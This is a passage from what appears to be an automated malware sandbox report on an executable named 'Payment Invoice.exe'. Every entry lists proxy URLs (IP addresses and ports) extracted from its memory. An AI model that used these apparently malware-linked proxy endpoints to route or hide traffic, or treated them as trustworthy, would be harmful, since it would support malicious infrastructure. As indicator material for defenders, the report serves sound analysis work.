                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.180.19.140:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.180.19.140:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.158.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.158.162:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.158.162:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.184.6
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.184.6://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.184.6:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.202.104.22:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.202.104.22:3128://proxy8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.206:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:1081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:1081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.24
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:3128p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.34.201.244:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.34.201.244:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.44.42.115:58386
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.44.42.115:58386://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.25.124:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.25.124:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631718B000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163171B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.33.187:55507
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163171A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.33.187:55507://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.97.89:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.97.89:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.61.33.234
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.61.33.234://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.61.33.234:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.75.192.13
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.75.192.13://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.75.192.13:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.65.91
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.65.91://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.65.91:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.89.192:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.89.192:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.122.86.118://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.122.86.118:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.145.6.32
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.145.6.32://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.145.6.32:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.145.6.36
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.145.6.36://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.145.6.36:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.166
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.166://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.166:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.177
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.177://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.177:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.178
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.178://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.178:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.180
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.180://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.180:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.181:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.182://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.182:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.183://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.183:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.226
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.226://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.226:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.232
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.232://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.232:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.239
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.239://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.239:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.112
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.112://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.112:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.113
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.113://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.113:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.114
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.114://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.114:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.116
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.116://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.116:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.119
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.122
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.122://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.122:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.209
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.209://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.209:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.211
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.211://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.211:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.187
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.187://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.187:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.188
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.188://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.188:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.189
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.189://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.189:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.24
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.24://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.24:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.26
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.26://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.26:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.27
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.27://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.27:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.28://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.28:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.28X
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.34
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.34://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.34:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.171.68.130
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631965D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.171.68.130://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.171.68.130:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.218.160://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.218.160:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.218.160p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.227.202
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.227.202://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.227.202:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.39.98
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.39.98://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.39.98:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.121
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.121://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.121:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.124
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.124://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.124:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.125
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.125://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.125:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.138
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.138://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.138:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.144
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.144://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.144:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.145:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.146
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.146://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.146:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.148
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.148://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.148:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.149
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.149://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.149:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.150
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.150://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.150:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.151
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.151://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.151:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.182.90
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.182.90://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.182.90:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.11
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.11://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.11:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.12
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.12://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.12:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.14://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.14:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.14H
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.9://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.9:80
